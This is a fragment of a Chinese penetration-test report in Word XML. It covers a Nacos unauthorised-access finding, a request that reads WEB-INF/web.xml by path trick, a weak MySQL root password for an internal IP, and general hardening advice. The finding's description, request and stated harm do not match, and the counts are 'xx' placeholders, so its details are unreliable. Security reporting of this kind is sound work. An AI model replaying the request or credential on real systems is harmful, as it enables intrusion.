        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Web安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4.1.1 Nacos未授权访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">未授权用户可以使用默认凭证登录nacos后台，并且可以调用api接口进行用户创建，密码修改等敏感操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">影响主机：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| IP | PORT  | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 10.9.18.205 | 89  | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1  问题数据包：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Host: 10.9.18.205:89</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53xx.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/53xx.36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.xx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |   | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| GET /%2e/WEB-INF/web.xml HTTP/1.1 |  |  |  |  |  |  |  |  |  |  |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2  问题描述：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3 问题危害：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">攻击者可以对短信验证码进行重复验证，爆破成功后进入后台进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">风险级别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 威胁级别 | 高危 | ■ | 中危 |  | 低危 |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">开启鉴权功能，关闭不必要接口，收缩暴露面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">弱口令风险</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">MYSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| IP | 账户 | 密码  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 10.9.18.205:3306 | root | 123456  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">风险等级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |   | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 威胁级别 | 高危 | ■ | 中危 |  | 低危 |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">修复弱口令问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">安全风险总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">安全概况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">经过测试发现校跑系统存在安全漏洞xx个。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">高危xx个，中危xx个，低危xx个。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">因此，我们认为校跑系统安全状态为“紧急状态”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">安全管理方面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">进一步落实口令管理制度，建议使用独立的、随机生成的满足强度要求的口令，严禁使用弱口令、统一口令管理服务器，及时销毁临时、测试账户；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">进一步加强人员安全意识教育，预防攻击事件发生。例如周期性的修改信息系统口令、尽可能的使用客户端收发电子邮件、退出使用WEB邮箱系统时一定要注意注销用户而不是关闭浏览器等等；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">信息系统上线前增加安全验收环节，保证系统安全上线；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">信息系统下线后增加安全退出环境，保证相关信息、防火墙规则、数据的安全处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">安全技术方面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">运行环境部署需要进行加固处理，Web应用访问数据库的用户需要采用最小权限原则，防止攻击者利用数据库缺陷进行权限提升等操作，同时对中间件软件，如WEBSPHERE、TOMCAT、JBOSS等，应进行降权运行处理，防止脚本木马直接获得系统权限；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">关注各个应用系统所使用程序、组件、第三方插件等安全现状，及时更新相应的补丁版本；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">加强对敏感服务器、配置文件、目录的访问控制，以免敏感配置信息泄露；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">加强信息系统安全配置检查工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">开发过程管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">在系统开发与运行维护的所有阶段（如：计划需求、设计、编码、测试、运行和维护）强制实施严格的变更控制，对变更的申请、审核、测试、批准、执行计划与具体实施提出明确要求，确保系统安全性与控制措施不被损害；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">变更控制包括以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">审查变更控制措施和流程的完整性，确保未被修改和破坏；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">确保操作系统的更改不会对应用系统的安全性和完整性造成不良影响；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">确保系统文档在每次修改后得到及时更新，并确保旧文档被正确归档和处置；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">做好软件升级的版本控制，如保存历史版本；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">保留所有变更的审计跟踪记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">确保操作文档以及用户程序能在必要时被修改；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">确保及时更新业务连续性计划。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">针对开发人员对源代码的管理，应严禁将源代码信息上传至互联网上的网络磁盘或源代码仓库，如GITHUB、网盘等；建议建立自运营的代码管理仓库，如有必要上传至互联网上，应对敏感关键信息进行屏蔽，如API地址、IP地址、数据库密码等，防止信息泄露；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">应尽量避免修改厂商提供的软件包，如必须修改，应注意以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">评估软件包内置的控制措施和完整性流程遭受破坏的风险；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">应征得原厂商的同意，由原厂商提供标准的升级程序来实现软件包的更改。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">在软件的原始采购、开发、使用和维护过程中，应采取如下防范控制措施：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">仅从信誉卓著的厂商处购买软件；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">尽量购买提供源代码的软件，以便进行检验，在投入使用之前检查所有源代码；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">使用通过权威机构评估测试的软件产品；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">一旦安装完毕，控制对源代码的访问和修改；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">安装并正确使用有关后门、特洛伊代码的检测和查杀工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">安全架构设计基本原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">在应用系统软件开发设计的过程中，对应用系统的总体设计应当满足如下安全原则：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Separation of Duties</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Defense in Depth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Fail Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Single Point of Failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Least Third Party Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Leveraging Existing Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Data Protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Auditing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Open Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Anti Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Standardization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Scalability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Practicable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Regulatory Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 原则 | 说明  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 最小权限原则 |  | 应用软件的每个模块如进程、用户只能访问当下所必需的信息或者资源。赋予每一个合法动作最小的权限，以保护数据以及功能避免受到错误或者恶意行为的破坏。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 权限分离原则 |  | 对业务的操作、管理和审计权限应该由软件中的不同角色的用户分别承担；普通用户和管理员用户信息应该存放在不同的数据表中。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 深度防御原则 |  | 在应用程序对业务数据进行处理的每个阶段都要考虑安全性问题，不能仅在某个阶段做安全防御，这样单点防御一旦被突破将造成安全风险。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 容错保护原则 |  | 当程序出现故障时或系统异常当系统失败时，可以进入到一个失败保护的状态。如果用户请求失败，系统仍可保障安全。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 单点异常终止原则 |  | 当用户提交数据超出预期时，应立即终止程序的执行，不要试图加以修正并继续执行下去。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 外来代码安全原则 |  | 严格控制第三方函数与插件的使用，对外来代码必须进行详细的安全测试。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 代码重用原则 |  | 尽可能的重用软件已有的模块，这样可以降低引入新的漏洞和攻击界面的可能性。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 数据保护原则 |  | 对用户数据的保护功能应涵盖用户数据存储的完整性、用户数据传输保密性、数据传输的访问控制、剩余信息的保护、数据反转操作等内容；应对系统中关键数据（如用户密码等）的存储和网络传输时应采用加密保护，实用加密加密算法应该符合国际标准、国家标准和业界标准。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 可审计原则 |  | 在应用系统中设计审计日志记录的功能，并对应用系统产生的日志增加完备的审计功能。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 开放设计原则 |  | 开放设计与“不开放即安全”的原则相对而言，认为设计本身不应具有神秘感。这一原则的具体表现可以参见应用于加密设计的Kerchoff定律，“系统不应单纯依赖私密性，若落入敌人手中则毫无优势可言”；开放设计以提高系统兼容性和可扩展性。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 抗抵赖原则 |  | 对于涉及支付交易等重要的业务场景，系统设计应有效地防止通信双方抵赖，如采用电子证书签名等方式。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 规范性 |  | 系统设计所采用的安全技术和安全产品应符合国际标准、国家标准和业界标准，为系统的扩展升级、与其他系统的互联提供良好的基础。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 可扩展性 |  | 以当前业务安全需求为基础，充分考虑发展的需要，安全功能模块子系统以插件或接口方式以方便未来的扩展。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 实用性 |  | 安全功能设计需要尽可能的考虑投入产出比，同时尽量控制对用户体验的影响。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 符合性 |  | 安全功能的设计尽可能的要符合国家规范、行业规范以及业界的通用标准，如等级保护等规范。  | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">安全风险状况等级说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 安全风险状况说明  | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 良好状态 | 信息系统处于良好运行状态，没有发现或只存在零星的低风险安全问题，此时只要保持现有安全策略就满足了本系统的安全等级要求。  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 预警状态 | 信息系统中存在一些漏洞或安全隐患，此时需根据评估中发现的网络、主机、应用和管理等方面的问题对进行有针对性的加固或改进。  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 严重状态 | 信息系统中发现存在严重漏洞或可能严重威胁到系统正常运行的安全问题，此时需要立刻采取措施，例如安装补丁或重新部署安全系统进行防护等等。  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 紧急状态 | 信息系统面临严峻的网络安全态势，对组织的重大经济利益或政治利益可能造成严重损害。此时需要与其他安全部门通力协作采取紧急防御措施。  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">漏洞等级状况说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
